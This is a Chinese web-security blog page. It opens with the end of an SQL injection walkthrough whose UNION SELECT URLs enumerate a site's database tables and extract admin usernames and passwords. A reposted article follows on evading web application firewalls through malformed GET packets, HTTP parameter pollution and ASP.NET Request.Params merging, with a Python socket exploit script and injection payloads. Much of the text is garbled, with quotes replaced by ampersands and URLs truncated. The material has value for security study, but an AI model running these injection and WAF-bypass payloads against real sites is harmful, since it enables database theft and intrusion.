xx.com/news_info.php?wid=-1/**/union/**/select/**/1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.
TABLES/**/where/**/TABLE_SCHEMA=0x65/**/limit/**/11,1
tg_adminuser十六进制编码为0xD696E,依次查找该表里面的字段名,如图4,图5
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.
COLUMNS/**/where/**/TABLE_NAME=0xD696E/**/limit/**/1,1&
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.
COLUMNS/**/where/**/TABLE_NAME=0xD696E/**/limit/**/2,1&
数据库,表名,字段我们都知道了,查出密码就很简单了,如图六
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,username,3,4,password,6,7,8,9,10,11,12,13,14,15/**/from/**/webbase.tg_adminuse&
文章就到这里结束了,懂点sql语法的朋友应该看的比较明白了:)&&
浅谈绕过WAF的数种方法(转载)
0&00 前言08年初诞生了一种SQL群注攻击,黑客在全球范围内对asp,asp.net加MSSQL架构的网站进行了疯狂扫荡。由于MSSQL支持多语句注入,黑客通过一条结合游标的SQL语句就能将整个数据库的字段内容自动进行篡改,可以在网站上无差别的进行网页木马攻击。互联网是快速更新迭代的,但是很多没有开发能力的单位都是通过外包建立网站,网站的程序一上线就再也无人维护,很多程序存在各种漏洞无法修补,于是WAF便有了市场,现今门槛低且最能解决问题的是针对IIS/apache的软件WAF,通常一个模块一个扩展就能搞定,当然也有耗资百万千万的硬件WAF,然而如果WAF拦截规则出现漏洞,这百万千万的硬件也就是一堆废铁。那么WAF是否真的可以解决所有的WEB安全问题呢?所以本文主要解析一些可以绕过WAF的罕见漏洞,供安全人员参考。0&01 Request对象的包解析漏洞.asp和asp.net的Request对象存在一个包解析漏洞,Request对象对于GET和POST包的解析过于宽松,用一句话表达就是Request对象它GET和POST傻傻分不清楚,稍有点web开发经验的同学应该知道Request接收GET,POST,COOKIE也就是GPC传过来的数据,但是asp和.net库内置的Request对象完全不按RFC标准来,下面我们可以做个测试:
分别将下面两段代码保存为1.asp和1.aspx使用asp的Request对象接收t参数传值&&&&&&&&&&&&&&&&<%Response.Write &Request:& & Request(&t&)%>&&&&&&&&&&&&&&&&使用asp.net的Request对象接收t参数传值&&&&&&&&&&&&&&&&<%@ Page Language=&C#& %><%string test = Request["t"];Response.Write(&Request:&+test);%>&&&&&&&&&&&&&&&&使用下面的python脚本调用socket发送原始的HTTP包&&&&&&&&&&&&&&&&#!/usr/bin/env pythonimport sockethost = &192.168.239.129&path = &/1.asp&port = 80s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((host, port))s.settimeout(8)exploit_packet=&t=&/**/or/**/1=1&&exploit_packet+=&\r\n& * 8packet_length = len(exploit_packet)packet=&GET & + path + & HTTP/1.1\r\n&packet+=&Host: & + host + &\r\n&packet+=&Content-Length: %s\r\n& % packet_lengthpacket+=&Content-Type: application/x-www-form-urlencoded\r\n&packet+=&\r\n&packet = packet + exploit_packetprint packets.send(packet)buf = s.recv(1000)if buf: print buf[buf.rfind("\r\n"):]s.close()&&&&&&&&&&&&&&&&我们发送的原始包是:GET /1.asp HTTP/1.1Host: 192.168.239.129Content-Length: 34Content-Type: application/x-www-form-urlencodedt=&/**/or/**/1=1&结果返回如下:Request:&/**/or/**/1=1&将python测试脚本的path改为/1.aspx测试页返回同样结果。我们可以看到这是一个畸形的HTTP GET请求包,这个包的奥秘在于t=&/**/or/**/1=1&参数后的8个回车换行和Content-Length头,包的结构类似于一个POST包,而请求的方法是GET,最后asp和asp.net的Request对象成功的解析了这个畸形包取出了数据。所以如果WAF没有处理好HTTP包的内容,沿用常规思路处理GET和POST的逻辑的话,那么这个畸形包将会毁掉WAF的基础防御。0&02 被遗忘的复参攻击.大家应该还记得09年的HTTP Parameter Pollution攻击,查看[3]文档,可以发现ASP/IIS和ASP.NET/IIS的场景下存在一个复参特性,本文将利用这种的特性的攻击简称为复参攻击,用0X01里的例子简单的测试一下:用GET请求传入两个t参数GET http://192.168.239.129/1.asp?t=1&t=2将返回Request:1, 2asp和asp.net的Request对象接收了两个参数,并且以逗号分隔,所以便衍生出了[3]文档中的复参SQL注入方法:Vulnerable code:SQL=&select key from table where id=&+Request.QueryString(&id&)This request is successfully performed using the HPP technique:/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/usersThe SQL request becomes:select key from table where id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/usersLavakumarKuppan,我们可以看到通过巧妙的运用注释符结合复参特性可以分割GET参数中的SQL注入语句,如果WAF对GET参数的处理过于简单是不是会匹配不到拦截规则呢?0&03 高级复参攻击.ASP.NET的Request对象有一个Params属性,ASP.NET程序员在一些程序中会使用Request.Params["xxx"]传入数据,参考[4]微软MSDN文档我们可以知道Params属性的特性,该属性接收GET,POST和Cookie的传值集合,这里我们可以修改0&01里的例子测试一下:使用asp.net的Request.Params方法接收t参数传值&&&&&&&&&&&&&&&&<%@ Page Language=&C#& %><%string test = Request.Params["t"];Response.Write(&Request:&+test);%>&&&&&&&&&&&&&&&&发送一个POST包,GET,POST,COOKIE三个方法中都带有不同的t参数内容&&&&&&&&&&&&&&&&POST http://192.168.239.129/1.aspx?t=1 HTTP/1.1Host: 192.168.239.129Cookie: t=2t=3&&&&&&&&&&&&&&&&结果返回Request:1,3,2最后得出结论,Request.Params方法接收的数据是按照GPC顺序整合,看到这里的同学再联想到0&02的复参攻击应该如醍醐灌顶了,我们可以将SQL攻击语句拆分到GET,POST,COOKIE三个变量里进行组合攻击。想一想WAF针对这种高级复参攻击是否防御好了?0&04 后话WAF是不可能解决所有安全问题的,本文的思路归其本源实际上是描叙了WAF处理HTTP包与服务端处理HTTP包数种差异。互联网是不断更新迭代的,差异存在,类似的漏洞也会存在。本文提到了三种绕过WAF的思路,第一种是我的原创属于0DAY状态,第二种是参考已有的复参攻击,其中第三种高级复参攻击是由Safe3同学提出的,本文也是与Safe3同学讨论他开发的WAF的BUG而来,所以感谢Safe3同学。另外请大家不要将本文的内容用于非法途径,仅供安全人员参考,谢谢。参考:[1].http://www.faqs.org/rfcs/rfc2616.html[2]..cn/asp/asp_ref_request.asp[3]./download/PT-devteev-CC-WAF-ENG.pdf[4]./en-us/library/system.web.httprequest.aspx
本站内容均为原创,转载请务必保留署名与链接!
站长在关注}

我要回帖

更多关于 免杀木马 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信